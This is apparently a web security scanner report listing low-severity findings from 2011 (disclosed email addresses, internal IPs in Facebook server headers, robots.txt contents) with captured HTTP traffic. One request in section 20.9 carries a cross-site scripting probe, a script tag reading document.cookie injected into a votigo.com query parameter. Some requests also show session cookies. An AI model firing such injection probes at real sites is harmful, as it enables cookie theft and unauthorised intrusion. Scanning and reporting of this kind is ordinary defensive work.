GIF89a.............!.......,........@..D.;

19.7. http://community.invisionpower.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.invisionpower.com
Path:	/

Issue detail

The following email address was disclosed in the response:

sales@invisionpower.com

Request

GET / HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://www.invisionpower.com/suite/demo.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); maan_session_id=42dba258540c68eecf8b0d153ac3f241; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.2.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=5b586a1ac8eea5fe7c8c9d1467fedcfa; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Sat, 14 May 2011 16:26:18 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 156303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<p class='desc'>If you have questions about our products or services before you purchases post your question here or email sales@invisionpower.com for assistance.</p>
...[SNIP]...

19.8. http://cpm.criteo.com/lp/scripts/jquery.innerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/scripts/jquery.innerfade.js

Issue detail

The following email address was disclosed in the response:

t.baldes@medienfreunde.com

Request

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:29 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:04 GMT
ETag: "5613760-133e-49fc64904682d"
Accept-Ranges: bytes
Content-Length: 4926
Content-Type: application/javascript

/* =========================================================

// jquery.innerfade.js

// Datum: 2008-02-14
// Firma: Medienfreunde Hofmann & Baldes GbR
// Author: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/
// and Ralf S. Engelschall http://trainofthoughts.org/

*
* <ul id="news">
...[SNIP]...

19.9. http://www.insidefacebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidefacebook.com
Path:	/

Issue detail

The following email address was disclosed in the response:

partners@tapjoy.com

Request

Response

19.10. http://www.invisionpower.com/suite/demo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.invisionpower.com
Path:	/suite/demo.php

Issue detail

The following email address was disclosed in the response:

sales@invisionpower.com

Request

Response

19.11. http://www.shoutlet.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutlet.com
Path:	/

Issue detail

The following email address was disclosed in the response:

sales@shoutlet.com

Request

Response

19.12. http://www.votigo.com/corp/css/screen.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.votigo.com
Path:	/corp/css/screen.css

Issue detail

The following email addresses were disclosed in the response:

jim@votigo.com
priyanka@votigo.com

Request

GET /corp/css/screen.css?v=5 HTTP/1.1
Host: www.votigo.com
Proxy-Connection: keep-alive
Referer: http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NJMZMZS192.168.1.181CKMLM

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:16 GMT
Server: Apache
Last-Modified: Mon, 18 Apr 2011 15:23:02 GMT
ETag: "ef8003-ab9b-4a132f7a40180"
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Tue, 14 Jun 2011 16:53:16 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 43931

@charset "utf-8";
/*
Copyright (c) 2010, Votigo, Inc. All rights reserved.

Author:            Votigo, Inc
Design:            jim@votigo.com
Development:    priyanka@votigo.com
*/

/*
[struct]        page structure (wrapper, templates, etc.)
[links]            default link treatments
[overrides]        overrides for defaults
[forms]            web forms
[copy]            default copy treatments
[extras]
...[SNIP]...

20. Private IP addresses disclosed previous next
There are 10 instances of this issue:

http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://www.facebook.com/connect.php/js/FB.SharePro/
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.votigo.com/corp/solutions/fbcontests.php

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

20.1. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.198

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.198
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=192
Expires: Sun, 15 May 2011 16:29:54 GMT
Date: Sun, 15 May 2011 16:26:42 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

20.2. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.196

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df10ca81b4c%26origin%3Dhttp%253A%252F%252Fwww.shoutlet.com%252Ff3f2222ad8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=dark&font=arial&href=http%3A%2F%2Fwww.facebook.com%2Fshoutlet&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=254
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.196
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1672
Expires: Sun, 15 May 2011 17:22:45 GMT
Date: Sun, 15 May 2011 16:54:53 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

20.3. http://www.facebook.com/connect.php/js/FB.SharePro/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect.php/js/FB.SharePro/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.63.59

Request

GET /connect.php/js/FB.SharePro/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.insidemobileapps.com/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=1200
Content-Type: application/x-javascript; charset=utf-8
ETag: "c52ea28f19b96d3d867f6d652597618e"
Expires: Sun, 15 May 2011 17:13:08 GMT
X-FB-Server: 10.52.63.59
X-Cnection: close
Date: Sun, 15 May 2011 16:53:08 GMT
Content-Length: 6584

/*1305478388,171196219,JIT Construction: v378427,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

20.4. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.132.46

Request

GET /extern/login_status.php?api_key=167973672925&app_id=167973672925&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc2d01a2c%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff367a5bfdc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfb585e5cc%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff367a5bfdc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d7fc94f4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2420c9954%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff367a5bfdc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d7fc94f4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df171948e5c%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff367a5bfdc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d7fc94f4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1bc99f9c%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff367a5bfdc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d7fc94f4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/files/file/4226-rsyvarth-social-groups/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f171948e5c&origin=http%3A%2F%2Fcommunity.invisionpower.com%2Ff367a5bfdc&relation=parent&transport=postmessage&frame=f2d7fc94f4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.132.46
X-Cnection: close
Date: Sun, 15 May 2011 16:27:47 GMT
Content-Length: 0

20.5. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.55.55

Request

Response

20.6. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.42.55

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df10ca81b4c%26origin%3Dhttp%253A%252F%252Fwww.shoutlet.com%252Ff3f2222ad8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=dark&font=arial&href=http%3A%2F%2Fwww.facebook.com%2Fshoutlet&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=254 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.shoutlet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

20.7. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.25.41

Request

Response

20.8. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.83.59

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.votigo.com&layout=button_count&show_faces=false&width=170&action=like&font=lucida+grande&colorscheme=light&height=27 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.votigo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

20.9. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.22.29

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.votigo.com&layout=button_count&show_faces=false&width=170&action=like&font=lucida+grande&colorscheme=light&height=27 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebook&b3bee%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E50da1df71b5=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

20.10. http://www.votigo.com/corp/solutions/fbcontests.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.votigo.com
Path:	/corp/solutions/fbcontests.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.1.180

Request

Response

21. Robots.txt file previous next
There are 20 instances of this issue:

http://743-ngz-698.mktoresp.com/webevents/visitWebPage
http://cdn.shoutlet.com/static/flash/swfjs/
http://community.invisionpower.com/
http://cpm.criteo.com/lp/web_us.html
http://dis.us.criteo.com/dis/dis.aspx
http://feeds.bbci.co.uk/news/rss.xml
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1032613984/
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://www.appdata.com/images/appicon.png
http://www.conversionruler.com/bin/js.php
http://www.criteo.com/
http://www.facebook.com/extern/login_status.php
http://www.google-analytics.com/__utm.gif
http://www.googleadservices.com/pagead/conversion/1032613984/
http://www.insidefacebook.com/
http://www.insidemobileapps.com/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php
http://www.shoutlet.com/features/landingpage.php
http://www.youtube.com/v/m0UQucWM0Zw

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

21.1. http://743-ngz-698.mktoresp.com/webevents/visitWebPage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://743-ngz-698.mktoresp.com
Path:	/webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 743-ngz-698.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:44 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 23:21:22 GMT
ETag: "7621c3-18-4a202d0b50080"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

21.2. http://cdn.shoutlet.com/static/flash/swfjs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.shoutlet.com
Path:	/static/flash/swfjs/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.shoutlet.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "b9c29f-1a-9428ed00"
Accept-Ranges: bytes
Content-Type: text/plain
Age: 120384
Date: Sun, 15 May 2011 16:53:15 GMT
Last-Modified: Thu, 26 Jun 2008 14:26:28 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

21.3. http://community.invisionpower.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.invisionpower.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: community.invisionpower.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Thu, 23 Dec 2010 10:38:15 GMT
ETag: "69d0a11-60e-49811779593c0"
Accept-Ranges: bytes
Content-Length: 1550
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /cache/
Disallow: /converge_local/
Disallow: /hooks/
Disallow: /ips_kernel/
Disallow: /retail/
Disallow: /public/style_captcha/
Disallow: /index.php?app=core&
...[SNIP]...

21.4. http://cpm.criteo.com/lp/web_us.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/web_us.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cpm.criteo.com

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R2976327662; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:29 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Fri, 13 Aug 2010 07:23:14 GMT
ETag: "31139c7-130-48daf5b20c569"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

21.5. http://dis.us.criteo.com/dis/dis.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dis.us.criteo.com
Path:	/dis/dis.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sun, 15 May 2011 16:56:15 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

21.6. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3574
Expires: Sun, 15 May 2011 17:56:43 GMT
Date: Sun, 15 May 2011 16:57:09 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

21.7. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1032613984/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1032613984/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 15 May 2011 16:53:24 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

21.8. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:12:05 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=86922196
Expires: Fri, 14 Feb 2014 18:00:21 GMT
Date: Sun, 15 May 2011 16:57:05 GMT
Connection: close

User-agent: *
Disallow: /

21.9. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Sun, 15 May 2011 16:26:42 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

21.10. http://www.appdata.com/images/appicon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.appdata.com
Path:	/images/appicon.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.appdata.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:52:12 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 14 May 2011 13:56:40 GMT
ETag: "6c800f-e5-4a33ccaa4b600"
Accept-Ranges: bytes
Content-Length: 229
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
#User-Agent: *
#Disallow:
...[SNIP]...

21.11. http://www.conversionruler.com/bin/js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.conversionruler.com
Path:	/bin/js.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.conversionruler.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:15 GMT
Server: Apache/2.2.11 (FreeBSD)
Last-Modified: Sun, 13 Mar 2011 04:22:55 GMT
Accept-Ranges: bytes
Content-Length: 50
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /clients
Disallow: /admin

21.12. http://www.criteo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.criteo.com

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R3497929746; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:56 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 14 Apr 2011 22:24:35 GMT
ETag: "1070ae-131-4a0e863e84df1"
Accept-Ranges: bytes
Content-Length: 305
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

21.13. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.102.61
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

21.14. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sun, 15 May 2011 16:26:05 GMT
Expires: Sun, 15 May 2011 16:26:05 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

21.15. http://www.googleadservices.com/pagead/conversion/1032613984/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1032613984/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 09 May 2011 20:53:07 GMT
Date: Sun, 15 May 2011 16:53:22 GMT
